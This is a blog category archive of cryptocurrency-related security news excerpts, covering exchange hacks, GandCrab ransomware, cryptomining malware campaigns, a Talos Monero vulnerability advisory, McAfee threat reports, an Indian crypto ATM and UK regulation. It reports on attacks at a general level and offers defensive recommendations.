Category Archives: cryptocurrency

EOSBet Got Hacked Again; Lost 65000 EOS To Hackers

A month ago we heard of an attack on the EOSBet gambling app. That time, the hackers exploited a vulnerability

EOSBet Got Hacked Again; Lost 65000 EOS To Hackers on Latest Hacking News.

GandCrab Partners With NTCrypt for Code Obfuscation

GandCrab ransomware has evolved again, and the newest version features a partnership with NTCrypt to facilitate code obfuscation and frustrate security researchers.

As noted by McAfee, GandCrab’s authors deployed version 5 of the ransomware on Sept. 27. Since first appearing in January 2018, the code’s authors have released regular updates that both improved functionality and introduced new bugs.

As the McAfee report put it, the ransomware authors “are undoubtedly confident and have strong marketing skills, but flawless programming is not one of their strengths.” Still, public endorsement of FalloutEK and a new partnership with NTCrypt suggest that GandCrab is looking to claw its way into as many devices as possible with this new iteration.

What Does GandCrab’s Development Mean for Malware Security?

The makers of GandCrab aren’t afraid of notoriety; each new release comes with flashy announcements and promises of new partnerships. As a result, a members-only club of affiliates has developed around GandCrab, with more waiting in the wings to distribute the ransomware. GandCrab’s popularity has also led to partnerships with other criminal groups, which has helped the malware evolve from a simple infection vector to a more sophisticated ransomware-as-a-service.

Particularly concerning is GandCrab’s ability to attract other criminal groups. Its partnership with NTCrypt was established by way of competition: The crypter received $500 from the developers and free advertising in all of GandCrab advertisements. Beyond the obfuscation offered by NTCrypt services, this recruiting method provides a way for malware developers to avoid low-quality partners while diversifying their supply chain.

The ransomware uses multiple attack vectors to infect devices, encrypt files and demand cryptocurrency, including remote desktop connections, phishing emails, legitimate programs with hidden Trojans, exploit kits, PowerShell scripts and botnets such as Phorpiex.

How to Avoid the Pinch of GandCrab’s Code Obfuscation

Although the GandCrab developers are working hard to deliver regular updates, their lack of coding sophistication also introduces bugs that limit functionality or cause outright failure. For example, a compiling flaw in version 5 relies on a dynamic-link library (DLL) not available in Windows Vista or XP, meaning the malware will only work on machines running Windows 7 or later. The authors also claimed that their code doesn’t rely on existing CVE’s, but this is inaccurate — GandCrab uses both CVE-2018-8440 and CVE-2018-8120.

Despite its flaws, however, GandCrab remains a potent attack vector. To counter this type of malware security threat, security experts recommend establishing a security baseline, incorporating security best practices into all endpoint builds and ensuring a consistent “golden image” that adheres to your security policy. Security teams should also create and maintain a live inventory of all devices to help pinpoint malware infections, and develop “an aggressive and current patch management policy” to help mitigate the impact of existing vulnerabilities.

Source: McAfee

The post GandCrab Partners With NTCrypt for Code Obfuscation appeared first on Security Intelligence.

India gets its first cryptocurrency ATM in Bengaluru

Crypto Exchange Unocoin Launches Its First Cryptocurrency ATM In India

Unocoin, the oldest crypto exchange, and blockchain company in India, officially launched its first cryptocurrency ATM in Bengaluru’s Kemp Fort Mall on October 14, 2018. The decision to open the ATM is to circumvent the ban imposed by India’s central bank, the Reserve Bank of India (RBI), that prevents the banks from doing any transaction involving cryptocurrencies.

The ATMs installed by Unocoin does not require any banking partnerships and are stand-alone machines that can accept and dispense cash.

“We at Unocoin have always believed in serving our customers with the best of their interest and with the most secure services. Since December 2013, our team has been serving the Indian bitcoin and blockchain community by continuously innovating and making ways for a smoother and wider experience,” the company said in a post on its official website.

The company has plans to expand the network by opening more ATMs in Mumbai and Delhi in a couple of weeks.

Sathvik Vishwanath, co-founder, and CEO of Unocoin, revealed to news.Bitcoin.com on Sunday: “The 1st ATM will be operational in Bangalore tomorrow. In the first phase we plan to deploy 30 machines, the first one is in Bangalore followed by Mumbai and New Delhi in the upcoming week.”

The ATM is meant exclusively for Unocoin and Unodax (crypto-to-crypto trading platform) customers, who can use it to deposit or withdraw Indian currency from the ATM. This can later be used by customers to buy cryptocurrencies (such as Bitcoin, Ethereum, or other crypto coins) from Unocoin’s website or mobile app.

In accordance with RBI ATM rules, the company has imposed daily limits transactions. The company’s post explains, “Users are subject to some limits on deposit and withdrawals per transaction and per day subject to cash handling restrictions in India. The minimum amount for deposit and withdraw is 1000 INR and must be in multiples of 500 INR.”

Vishwanath emphasized, “All coins on Unocoin and Unodax can be bought using the money deposited through ATM machines. We presently have 30 coins that can be bought.”

Solution to RBI Crypto Banking Ban

In April this year, RBI had issued a circular that bans financial institutions under its control from providing services to crypto businesses. The ban went into effect in July that saw all crypto exchanges in India lose their ability to provide rupee deposit and withdrawal services. The biggest example is Zebpay, the largest Indian crypto exchange, who had to recently close their cryptocurrency exchange due to banking problems.

“The RBI has imposed a ban on banks, regarding money-related transactions, so our customers are not able to buy easily or the ones who have it (bitcoins) are unable to withdraw their money,” Sathvik Vishwanath, co-founder and CEO of Unocoin, told Quartz.

“Therefore, we have come up with this solution to fill the gap caused by the central bank’s ban because right now cash-in and cash-out facility is not available,” Vishwanath said.

How does the ATM work?

The company’s post explains the process that customers need to follow to deposit and withdraw INR and carry out their trades.

“To deposit INR into his Unocoin/Unodax account, a user would reach to a Kiosk and enter his User ID and the OTP that he just received as SMS on his registered mobile number. The user would then confirm his account details and deposit the funds into the Kiosk machine. Instantly his Unocoin account will be updated with the deposited funds that he can use on Unocoin to buy BTC or ETH, or he can use it on Unodax to place BID orders on 30 various crypto assets.

“The user can withdraw the deposit INR before or can withdraw INR that he obtained by selling crypto assets on Unocoin or Unodax platforms. To withdraw INR, users have to make a request by visiting Unocoin.com or through Unocoin mobile app where he would specify the desired amount for withdrawal. The 12 digit reference number from Unocoin is sent to the user. The user would then visit the Unocoin Kiosk to enter the reference number and OTP that was sent to his registered mobile number to withdraw the INR to his hands,” the post explains.

Unocoin maintains that its machines do not violate RBI norms, which only prohibit non-banking entities from setting up ATMs for banking operations. “Our ATMs do not need banking network or relationship to work. They just work as the cash deposit and dispensing alternative for Unocoin customers,” said Vishwanath.

While the gap has been completely filled by these ATMs, the only inconvenience would be that customers will have to access a crypto ATM to complete these transactions physically.

Unocoin is looking to target malls and other locations in India that have higher footfalls, to set up more ATMs. “At present, the volume (of transactions) has become one-tenth of what it used to be (before the RBI crackdown). We believe that after we have deployed it in many other cities and it becomes popular then demand should come back,” said Vishwanath.

The post India gets its first cryptocurrency ATM in Bengaluru appeared first on TechWorm.

Authorities search & seize properties of GTA V’s “Infamous” cheat developers

By Carolina

Cheat developers are constantly under the radar of Take-Two Interactive and Rockstar Games. Both companies have previously taken legal action against cheat developers for protecting their games including the very popular Grand Theft Auto V (GTA V). Last month, they launched an operation against Australian developers, who had released a well-known mod-menu cheat for GTA […]

This is a post from HackRead.com Read the original post: Authorities search & seize properties of GTA V’s “Infamous” cheat developers

Threat Actors Obfuscate JavaScript to Hide Crypto-Mining Malware

Security researchers recently observed threat actors burying crypto-mining malware inside compromised websites to hijack victims’ computing resources.

Victims who visited a site infected with the malicious JavaScript code unwittingly unleashed a payload that was hidden within a header file of a WordPress theme, according to researchers from Sucuri.

Although the file itself was legitimate, the code obfuscated the crypto-mining malware and kept it at bay until it confirmed that:

  • The malware wouldn’t be detected via automated scans; and
  • The victim’s device had the central processing unit (CPU) power necessary to mine cryptocurrencies such as bitcoin and Monero.

After the malware confirmed that the infected device met these criteria, it began the mining process.

What Is Crypto-Mining Malware?

Cybercriminals have been using banking Trojans and other tools to mine cryptocurrency since at least 2013, according to the “IBM X-Force Threat Intelligence Index 2018.” One of the most common methods to date has involved mobile apps and websites laden with malicious code hidden inside ads, otherwise known as malvertising.

Coin-stealing has traditionally involved very basic pieces of malware that work over time on a victim’s endpoint. In this recent case, however, researchers were only able to discover the crypto-mining malware after refactoring the code and examining it in detail. Meanwhile, such attacks can drain smartphones, desktops and other systems to enrich the attackers.

How to Keep Crypto-Miners Away From Your Devices

To protect enterprise networks from crypto-mining malware, security experts recommend creating an inventory of all applications in use across the enterprise, then categorizing them by risk attributes, such as whether they are internal or customer-facing.

Security teams should also evaluate applications based on criticality, impact, reputational damage and loss of personally identifiable information (PII), for example. As this incident suggests, however, the impact of a crypto-mining attack could also include loss of computing resources to stealthy cryptocurrency miners.

Source: Sucuri

The post Threat Actors Obfuscate JavaScript to Hide Crypto-Mining Malware appeared first on Security Intelligence.

400% increase in cryptomining malware attacks against iPhones

By Waqas

It wouldn’t be wrong to state that Apple has become the apple of the eyes of cryptomining enthusiasts and cybercriminals. According to Check Point’s latest Global Threat Index, the company is being targeted more frequently in cryptomining malware attacks. The report discloses some startling new facts about the sudden rise in cryptomining malware attacks against […]

This is a post from HackRead.com Read the original post: 400% increase in cryptomining malware attacks against iPhones

Fake Adobe updates installing cryptomining malware while updating Flash

By Waqas

The IT security researchers at Palo Alto Networks has identified that a fake Flash updater is circulating the web and fooling computer users by sneakily installing cryptocurrency mining bot XMRig. In the past few months, researchers have identified 113 fake updaters installing cryptomining malware on targeted devices. The notorious updater is actively attacking computers since August […]

This is a post from HackRead.com Read the original post: Fake Adobe updates installing cryptomining malware while updating Flash

Fake Flash updates upgrade software, but install crypto-mining malware

According to cybersecurity firm Palo Alto Networks, it discovered a fake Flash updater that has been duping conscientious computer users since August. The fake updater installs files to sneak a cryptocurrency mining bot called XMRig, which mines for Monero.

But here's the catch, while the fake updater is installing the XMRig malware, it's also updating the user's Flash.

Via: The Next Web

Source: Palo Alto Networks

Shocking: Hackers using Googlebots in cryptomining malware attacks

By Waqas

Hackers are abusing Googlebot servers to deliver malicious payloads. Last year, HackRead exclusively reported on how hackers were using Google Adwords and Google Sites to spread malware. Then came another shocking research from Cisco Talos exposing how hackers exploited Google Search Results to distribute Zeus Panda banking trojan. Now, researchers at F5 identified a strange and infrequent behavior […]

This is a post from HackRead.com Read the original post: Shocking: Hackers using Googlebots in cryptomining malware attacks

Threat Actors Use Delphi Packer to Shield Binaries From Malware Classification

Threat actors are increasingly using a Delphi packer to shield their binaries from malware classification by antivirus software and other security solutions.

FireEye analyzed several samples carrying the “BobSoft Mini Delphi” signature and determined that the samples were consistent with Delphi code constructs. These findings revealed that the malware binaries had been packed using a Delphi packer.

The enterprise security firm observed the packed samples being dropped in various spam campaigns. One operation used an attached document with malicious macros to download the malware. Another leveraged a document that exploited an equation editor vulnerability to deploy its packed payload.

In its analysis, FireEye came across at least eight malware families using the Delphi packer for their campaigns. Lokibot was by far the most prominent, followed by the Pony downloader and NanoCore. Researchers also spotted a cryptomining threat called CoinMiner using the packer.

How Do Malicious Actors Avoid Malware Classification?

The Delphi packer is just the latest cybercriminal effort to prevent malware from being detected or reverse engineered. Attackers do this by concealing their payloads with code that’s not strictly malicious. In particular, packers use a technique called executable compression to make their files smaller. The Delphi packer adds on to this functionality by monitoring windows and mouse cursor movement for signs of a sandbox environment, in which case it puts itself into an infinite sleep.

Packers aren’t the only services that bad actors use to hide their malware. Malwarebytes noted that cybercriminals also turn to crypters, which use obfuscation or actual encryption to make their payloads undetectable, and protectors, which block reverse engineering attempts.

How to Protect Against Packed Malware

According to FireEye, security professionals can protect their organizations against packed malware by using sandbox environments that model real user behavior. The threat advisory on IBM X-Force Echange advises users to update their antivirus software and verify the legitimacy of any unsolicited email attachment. Finally, security personnel should analyze threat intelligence to learn about the latest packers that are available in dark web marketplaces.

Sources: FireEye, Malwarebytes

The post Threat Actors Use Delphi Packer to Shield Binaries From Malware Classification appeared first on Security Intelligence.

The Ethical Hacker Network: Webinar: Blockchain Hacking for Investigating Cryptocurrencies on Oct 24 2018

Register Now to Learn Blockchain Hacking Step-by-Step!

Nick Furneaux, forensics trainer, investigator & author of "Investigating Cryptocurrencies" takes you through a journey of code and tools to unpick the movement of illegal funds through the blockchain during this fascinating, FREE EH-Net Live! webinar on Wednesday October 24, 2018 at 1:00 PM US Eastern. Join us live to learn how to win free copies of his book!

The post Webinar: Blockchain Hacking for Investigating Cryptocurrencies on Oct 24 2018 appeared first on The Ethical Hacker Network.



The Ethical Hacker Network

Trust flourishes in blockchain

if implemented effectively, blockchain has the potential to transform the way we do business. After several years spent in the shadow of bitcoin, it’s time for blockchain, the technology on

The post Trust flourishes in blockchain appeared first on The Cyber Security Place.

Digital Assistants, Cryptocurrency, Mobile Malware: Trends from ‘McAfee Labs Threats Report’

Every three months, our team crafts the McAfee Labs Threats Report. The quarterly report ranges in topic and severity but always touches on the most important and impactful threats afflicting consumers and companies alike. This year, the McAfee Labs team analyzed an average of 1,800,000 URLs, 800,000 files and 200,000 high-risk files to produce the McAfee Labs Threats Report: September 2018, which features digital assistants, cryptocurrencies, and cybercriminal gangs up to no good. Overall, it’s been an eventful quarter.

So, what are the key takeaways for you? Notably, our team has continued to track a downward trend in new malware attacks for the second successive quarter. Good news on the surface, but that trend may not be indicative of much; as we also saw a spike in new malware in Q4 2017. We’ll continue to watch this into next year. Significantly, we found that a good portion of net new malware is designed for mobile, which increased 27 percent over the previous quarter. In addition, here’s a look at the other trending stories we uncovered.

Digital Assistants

Digital assistants are advanced programs that we can converse with to research, act on our behalf and overall help make our digital lives more comfortable. Siri, Bixby and Google Assistant are few. But one digital assistant, Microsoft’s Cortana, is a little too helpful. The good news, Microsoft quickly rolled out a fix for this vulnerability to protect your Windows 10 computer. Be sure your software is up to date.

Cryptocurrency

The second story involves cryptocurrencies. Cryptocurrencies are digital tokens generated by a computer after solving complex mathematical functions. These functions are used to verify the authenticity of a ledger, or blockchain. Blockchains, by their nature, are relatively secure. But an account that is connected to a blockchain — usually, in this case, associated with a cryptocurrency — is not. And that’s where cybercriminals are focusing their efforts, with coin miner malware up 86% in Q2 2018.

Our report found cybercriminals are chasing after access to cryptocurrencies and they’re doing so using familiar tactics. For example, phishing attacks — where cybercriminals pose as someone else online — are popular tools to take over a cryptocurrency-related account. Malicious programs are also deployed to collect passwords and other information related to an account before stealing virtual currency. You can read more about blockchain and cryptocurrency vulnerabilities here. 

Malicious Apps

Finally, the McAfee Mobile Research team found a collection of malicious applications facilitating a scam in the Google Play store. The apps in question siphon money from unwary users through billing-fraud. Billing-fraud collects money from victims for “using” a “premium” service, such as sending texts to a particular number.

In this case, the cybercriminal ring known as the AsiaHitGroup Gang attempted to charge at least 20,000 victims for downloading fake or copied versions of popular applications. To increase its potential, AsiaHitGroup Gang is using geolocation to target vulnerable populations.

So, what can you do to stay safe in the face of these threats? Here are three quick tips:

  • Limit device access. If you can, limit the ability and access a digital assistant has to your device. Often, you can adjust where and how an assistant is activated through your settings. Otherwise, update your software regularly, as many updates contain security fixes.
  • Create strong passwords. If you’re participating in the cryptocurrency market, then make sure you use strong, robust passwords to protect your accounts. This means using upper case, lower case, symbols and numbers for passwords that are 12 characters long. Afraid you might forget the key to your account? Consider using a password manager.
  • Be careful what you download. Always do some light research on the developer of a mobile application. If the information is hard to come across or absent, consider using an alternative program. Additionally, never download mobile applications from third-party app stores. Genuine stores, like Google Play and Apple’s App Store, should provide you with what you need.

And, of course, stay informed. To keep atop of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Digital Assistants, Cryptocurrency, Mobile Malware: Trends from ‘McAfee Labs Threats Report’ appeared first on McAfee Blogs.

Hackers exploit Bitcoin bug to print 235 million Pigeoncoins

By Uzair Amir

It has been confirmed by the Pigeoncoin developers that a recently discovered bug in Bitcoin’s code has now been exploited to print approx. 235m Pigeoncoins ($15,458). It must be noted that Pigeoncoin is a newly launched and somewhat lesser known digital currency. The reason the extraordinary feat was successfully pulled off by the hacker(s) is […]

This is a post from HackRead.com Read the original post: Hackers exploit Bitcoin bug to print 235 million Pigeoncoins

Fork-free, Energy Efficient Red Belly Blockchain Hits 30,000 Transactions per Second

Red Belly fork-free Blockchain, previously showed transaction speed several times faster than Bitcoin and Ethereum, was subjected to a new experiment, hitting the ability to provide 30,000 transactions per second. This is reported by CSIRO’s Data61, the technology arm of Australia’s national science agency, which took part in the development, together with the Concurrent Systems Research Group at the University of Sydney.

3,000 Trx/Sec matching 14 regions

The experiment was deployed in 14 regions covered by Amazon Web Services’ network, including North America, South America, Asia Pacific, and Europe. With 1,000 machines maintaining a copy of the current state of the Blockchain and the balance of all accounts, the Blockchain demonstrated an average transaction delay of three seconds, which is comparable to the delay obtained during a test last year with 260 replicas located in a single region.

In comparison, mainstream blockchain technologies need minutes, with the Bitcoin Blockchain and the Ethereum network typically processing seven and 20 transactions per second respectively.

The experiment emphasizes the newly launched Blockchain’s scalability while retaining fast transaction speeds makes it ideal for the processing of financial transactions and microgrids that use peer-to-peer trading to transform the energy sector.

Fork-free, no double spending

In addition to high throughput, Red Belly differs from existing solutions with a number of advantages. It is fork-free as contrasted to Bitcoin selecting the longest branch from a forked chain or tree where multiple nodes add different blocks at the same point before learning of the presence of other blocks.

The Blockchain eliminates the risks of double spending where an individual spends their money twice by initiating more than one transaction, researchers say.

Beyond that, It’s much more friendly to the environment because it requires much less electricity than blockchains maintained by proof of work and based on solving crypto puzzles, that requires massive amounts of energy. Red Belly is underpinned by a unique algorithm and offers performance that scales without an equivalent increase in electricity consumption.

“Real-world applications of blockchain have been struggling to get off the ground due to issues with energy consumption and complexities induced by the proof of work. The deployment of Red Belly Blockchain shows the unique scalability and strength of the next generation ledger technology in a global context,” Dr. Vincent Gramoli, senior researcher at CSIRO’s Data61 and head of Concurrent Systems Research Group at the University of Sydney said.

Being marked as a revolutionary solution for the global economy, Red Belly Blockchain has also attracted big-time investors. The company is currently in the middle of a Series A capital raise to help it commercialize, and Kosmos Capital, a VC firm specializing in blockchain investments, is the one leading the raise.

For more information on Red Belly Blockchain, visit redbellyblockchain.io.

The post Fork-free, Energy Efficient Red Belly Blockchain Hits 30,000 Transactions per Second appeared first on TechWorm.

Exploring the Fundamentals of Blockchain

While the concepts of cryptocurrency and blockchain have been around for years, it wasn’t until Bitcoin’s recent and dramatic explosion in value that these terms became mainstream. Once the digital

The post Exploring the Fundamentals of Blockchain appeared first on The Cyber Security Place.

Vulnerability Spotlight: Epee Levin Packet Deserialization Code Execution Vulnerability

This vulnerability was discovered by Lilith (>_>) of Cisco Talos.

Overview


The Epee library, which is leveraged by a large number of cryptocurrencies, contains an exploitable code execution vulnerability in the Levin deserialization functionality. An attacker can send a specially crafted network packet to cause a logic flaw, resulting in remote code execution.

In accordance with our coordinated disclosure policy, Cisco Talos has worked with the developers of Monero 'Lithium Luna' to ensure that these issues have been resolved and that an update has been made available for affected users. It is recommended that this update is applied as quickly as possible to ensure that systems are no longer affected by this vulnerability.


Vulnerability Details


Epee Levin Packet Deserialization Code Execution Vulnerability (TALOS-2018-0637 / CVE-2018-3972)


The Levin network protocol is an implementation of peer-to-peer (P2P) communications found in a large number of cryptocurrencies, including all of the currencies that are forked from the CryptoNote project. A few different implementations of Levin are in existence. This post, however, is focused on the Epee library implementation. This library is used in a large number of cryptocurrencies, most notably Monero. A vulnerability exists in the way the library deserializes the Levin protocol, leading to an incorrect type conversion or cast, which can be abused to gain remote code execution. For additional information, please see the advisory here.

The vulnerability was tested on Monero 'Lithium Luna' (v0.12.2.0-master-ffab6700).
https://lists.getmonero.org/hyperkitty/list/monero-announce@lists.getmonero.org/thread/DB22JKE5SU4KB772ZBQFXAI4FWVWMUNF/

Coverage


The following Snort ID will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 47342

‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues

As we look over some of the key issues from the newly released McAfee Labs Threats Report, we read terms such as voice assistant, blockchain, billing fraud, and cryptojacking. Although voice assistants fall in a different category, the other three are closely linked and driven by the goal of fast, profitable attacks that result in a quick return on a cybercriminal’s investment.

One of the most significant shifts we see is that cryptojacking is still on the rise, while traditional ransomware attacks—aka “shoot and pray they pay”—are decreasing. Ransomware attacks are becoming more targeted as actors conduct their research to pick likely victims, breach their networks, and launch the malware followed by a high-pressure demand to pay the ransom. Although the total number of ransomware samples has fallen for two quarters, one family continues to spawn new variants. The Scarab ransomware family, which entered the threat landscape in June 2017, developed a dozen new variants in Q2. These variants combined make up more than 50% of the total number of Scarab samples to date.

What spiked the movement, starting in fall 2017, toward cryptojacking? The first reason is the value of cryptocurrency. If attacker can steal Bitcoins, for example, from a victim’s system, that’s enough. If direct theft is not possible, why not mine coins using a large number of hijacked systems. There’s no need to pay for hardware, electricity, or CPU cycles; it’s an easy way for criminals to earn money. We once thought that CPUs in routers and video-recording devices were useless for mining, but default or missing passwords wipe away this view. If an attacker can hijack enough systems, mining in high volume can be profitable. Not only individuals struggle with protecting against these attacks; companies suffer from them as well.

Securing cloud environments can be a challenge. Building applications in the cloud with container technology is effective and fast, but we also need to create the right amount of security controls. We have seen breaches in which bad actors uploaded their own containers and added them to a company’s cloud environment—which started to mine cryptocurrency.

New technologies and improvements to current ones are great, but we need to find the balance of securing them appropriately. Who would guess to use an embedded voice assistant to hack a computer? Who looks for potential attack vectors in new technologies and starts a dialog with the industry? One of those is the McAfee Advanced Threat Research team, which provides most of the analysis behind our threats reports. With a mix of the world’s best researchers in their key areas, they take on the challenge of making the (cyber) world safer. From testing vulnerabilities in new technologies to examining malware and the techniques of nation-state campaigns, we responsibly disclose our research to organizations and the industry. We take what we learn from analyzing attacks to evaluate, adapt, and innovate to improve our technology.

The post ‘McAfee Labs Threats Report’ Highlights Cryptojacking, Blockchain, Mobile Security Issues appeared first on McAfee Blogs.

Zaif Cryptocurrency Exchange Hacked $60 Million Plundered

This year seems to be really hard for the cryptocurrency exchanges worldwide as we witness repeated successful hacks and cyber

Zaif Cryptocurrency Exchange Hacked $60 Million Plundered on Latest Hacking News.

Hackers steal $60 million from Japan’s Zaif cryptocurrency exchange

By Waqas

Zaif is the 35th largest cryptocurrency exchange by turnover. Hackers have stolen a whopping $60 million (6.7 billion yen) worth of cryptocurrency from Zaif, the 35th largest cryptocurrency exchange dealing in Bitcoin, Bitcoin Cash, and Monacoin. The exchange is owned by Tech Bureau, Corp. based in Nishi-Ku, Osaka, Japan. The hack attack took place on September 14th after hackers gained […]

This is a post from HackRead.com Read the original post: Hackers steal $60 million from Japan’s Zaif cryptocurrency exchange

First Publicly Known Malicious Crypto-Mining Campaign Launched Via Kodi

Researchers detected what they believe is the first publicly known malicious crypto-mining campaign launched via the open-source media player Kodi.

This month, Slovakian IT security company ESET discovered malware hidden in XvBMC, a Dutch repository for third-party Kodi add-ons. Further analysis revealed that threat actors had initially infected two other repositories with the malware in December 2017 and January 2018. From those two sources, the malware spread to XvBMC and throughout the rest of the Kodi platform.

Windows and Linux users ended up running the final malware payload, a Monero cryptocurrency miner, by adding the URL of a malicious repository to their Kodi installation or installing a Kodi build that contained either a malicious repository or an infected add-on. No variants targeting Android or macOS users were detected by ESET.

At the time of disclosure, the malware had infected 4,774 users and generated approximately $6,700.

Why Are Attackers Capitalizing on Add-Ons?

Cybercriminals are increasingly abusing add-ons and scripting functionalities in response to the tightening of security measures for operating systems. The industry recently witnessed this trend in the form of bad actors leveraging Visual Basic for Applications (VBA) macros to spread malware.

In 2016, IBM Managed Security Services observed an attack campaign using VBA macros to deliver Locky ransomware. Last year, Fortinet researchers observed two attacks where threat actors leveraged VBA macros embedded in Excel attachments to spread Dyzap malware and a variant of Strictor ransomware.

The ESET researchers clarified that they don’t expect Kodi add-ons to become the “next VBA,” but they did say they “may be an indication of things to come.”

How to Prevent a Crypto-Mining Campaign

To limit the threat of cryptojacking, security experts recommend implementing controls to help identify mining activity and blocking known crypto-mining malware variants. Security teams should also consider using security information and event management (SIEM) and behavioral analytics to identify suspicious resource usage patterns.

Sources: ESET, Fortinet

The post First Publicly Known Malicious Crypto-Mining Campaign Launched Via Kodi appeared first on Security Intelligence.

UK Treasury committee report: regulation is closing in on cryptocurrency

Bitcoin has truly taken off, at a current worth of more than 5,000 euros. Other cryptocurrencies are slowly catching up, but there is one special surprise waiting for investors and exchanges that might hinder their expansion plans. Things are about to get complicated because MPs in the UK want to regulate cryptocurrency, writes The Guardian.

For a while now, governments and institutions operating in the financial services industry have been discussing this aspect, trying to find ways to regulate it on grounds that it is risky and it enables illicit activities such as money laundering.

According to the Treasury committee report consumers are also at risk because cryptocurrency is yet an unregulated “wild-west”-type industry that bypasses banks, so there is no protection from the Financial Conduct Authority should anything happen to their crypto-assets. “Accordingly, investors should be prepared to lose all their money,” the report says.

In response, the FCA “agrees with the committee’s conclusion that bitcoin and similar crypto-assets are ill-suited to retail investors, and as we have warned in the past, investors in this type of crypto-asset should be prepared to lose all their money.”

“Bitcoin and other crypto-assets exist in the wild west industry of crypto-assets. This unregulated industry leaves investors facing numerous risks,” said the committee chair, Conservative MP Nicky Morgan. “Given the high price volatility, the hacking vulnerability of exchanges and the potential role in money laundering, the Treasury committee strongly believes that regulation should be introduced.”

CryptoUK, a trade association that represents companies operating in the digital currency landscape and promotes good conduct in this sector, embraced the report.

“As an industry we have been calling for the introduction of proportionate regulation to improve standards and encourage growth,” said Iqbal Gandham, the chair of CryptoUK. “Self-regulation by the industry was always intended to be a starting point – this must now be matched by government action.”

The committee strongly believes that proper regulation could reduce the number of cyberattacks and could turn cryptocurrency into a business opportunity.

Cyber Threat Alliance Releases Analysis of Illicit Cryptocurrency Mining

In response to the explosive increase in cryptomining campaigns in Q4 2017, the Cyber Threat Alliance has formed a cryptomining subcommittee to assess the threat. This committee comprises expert researchers from major cybersecurity companies, including McAfee. The committee has now released “The Illicit Cryptocurrency Joint Analysis,” an in-depth report on the current state of unlawful cryptomining. In the report we explain what led to the recent rise in cryptomining-based attacks, their impact, defense recommendations, and predictions for future evolution of the attack. As members of the Cyber Threat Alliance and the cybersecurity community, we hope that individuals and enterprises can use our research to protect themselves from this threat and improve global security.

The Rise of Illicit Cryptocurrency Mining

To understand the cryptomining threat we need to go back only to late 2017 and early 2018 to see the dramatic growth of cryptomining incidents. Since 2017, the combined data of several CTA members shows a 459% increase in detections of mining malware.

(Figure numbers are out of sequence. They are borrowed from the CTA report.)

The increase of mining malware positively correlates with the growth of the value of coins. Specifically, in late 2017 we saw the value of Bitcoin soar to US$20,000 per coin. Anything with a high value attracts cybercriminals, and cryptocurrencies experienced some of the most dramatic volatility ever of any currency. Cybercriminals were early adopters of cryptocurrencies and use them to fuel underground economies. They have increasingly turned to mining to increase their funds by stealing the computer power of their victims. This theft is also referred to as cryptojacking.

Cryptocurrency and Mining 

Cryptocurrencies have become an increasingly popular alternative to traditional electronic money (e-money). E-money is based on a fiat currency such as the U.S. dollar. One of the most common examples is prepaid credit cards, which stand for the backing currency without the need for physical cash. Cryptocurrencies are generally not backed by a fiat currency. In fact, they are considered decentralized—meaning there is no central authority.

Monero has several advantages over Bitcoin in terms of privacy and anonymity; this makes it a favorite among bad actors. Beyond anonymity concerns, resources required to mine Monero are significantly lower, enabling more users to participate and increasing the profitability of botnets.

The act of generating the coin is called mining, which is using system resources to solve a complex mathematical problem. Most major coins employ a “proof of work” that uses CPU resources to solve. Large groups of miners, including botnets, can amass their resources, called pool mining, on a single problem. The mining operations result in a solved mathematical equation that returns newly minted coins to the system and validates new transactions.

The State of Illicit Cryptocurrency Mining

Current incidents of illicit cryptomining occur through compiled executables. This practice is called binary-based mining. In the context of the browser, the practice is called browser-based mining. Binary-based cryptomining malware is delivered as a payload, often using spam or exploit kits. Open-source tools often facilitate mining. XMRig is a legitimate tool for mining Monero, yet is also frequently used by malicious actors for illicit cryptomining.

The most common browser-based miner is Coinhive. Used legitimately, it offers an alternative to ad revenue by monetizing system resources. However, it has been widely used without informing users. On occasion the owner of the service is unaware of the mining code; this was the case with a recent attack against both Facebook Messenger and Starbucks Wi-Fi. As of July 2, PublicWWW yielded at least 23,000 websites hosting Coinhive code.

An example of Coinhive script embedded within a website.

Beyond using browsers to gather system resources, malware authors have become increasingly sophisticated in other ways. They have taken advantage of widespread vulnerabilities such as EternalBlue to propagate, or have implemented other techniques for evasion. The Smominru attack was a very profitable campaign leveraging this approach. It used “living off the land” techniques to evade detection and increase its ability to mine Monero.

Impacts of Illicit Cryptocurrency Mining

Cryptomining may have an impact on both the short- and long-term security of an organization or user. Three primary impact areas include:

  • Potential security flaws that can lead to additional attacks
  • Physical damage
  • Impacts to business operations and productivity

If a device is used in an unauthorized way, there is evidence of a potential security flaw that needs to be addressed. In late 2017, misconfigured devices using FTP led to hundreds of thousands of Monero miners on consumer-grade devices. Bad actors can and have used these same flaws for additional attacks against the systems.

Physical damage is also a concern. The CPU-intensive operation of mining will produce excess heat and power consumption. For small devices the immediate concern is battery life. However, for large systems, especially data centers, the activity can increase the failure rate of components; this can have a major effect on the system. Ultimately this may lead to costly repairs or increased hardware requirements to support the expanded load.

Organizations may also see a hit to business operations. Mass-computing projects present a similar concern, albeit for more altruistic purposes. Folding@Home, a medical research project aimed at understanding proteins, can be installed to use computer resources to help the research. However, business operations may be impacted by a loss of productivity or additional costs. Many businesses prohibit installing these types of computing projects to protect against unexpected costs and disruptions.

Recommended Best Practices

Fortunately, the defense against cryptomining is very similar to that against other threats. Cryptomining malware uses the same tools and methods; thus maintaining good security practices goes a long way. These include analysis of non-typical network traffic, and properly configuring and patching systems. A few additional steps specific to cryptomining:

  • Monitor abnormal power consumption and CPU activity
  • Search logs for related mining strings such as Crypto, Coinhive, XMR, Monero, and cpuminer
  • Block mining pool communications
  • Use browser extensions to protect against browser-based cryptocurrency mining

For a more comprehensive list, including recommended Snort rules, see the Recommended Best Practices section of the report.

The Evolution of Illicit Mining

Illicit cryptocurrency mining appears to have a positive correlation with Bitcoin value. As long as cryptocurrencies such as Bitcoin have value, we expect bad actors will continue to mine for profits. Although public cryptocurrencies like Bitcoin may be closely tied to monetary value, private or custom blockchains are also at risk and also need to prepare against future attacks.

Private blockchains, including non-currency-related ones, may carry unique risks. Large blockchains such as Bitcoin are considered immutable due to the difficulty of changing historical ledger data. Private blockchains inherently lack the same scale of adoption and thus may be more susceptible to attacks. The 51% attack is a well-known threat that can take advantage of a smaller network and have a severe impact on the blockchain’s integrity.

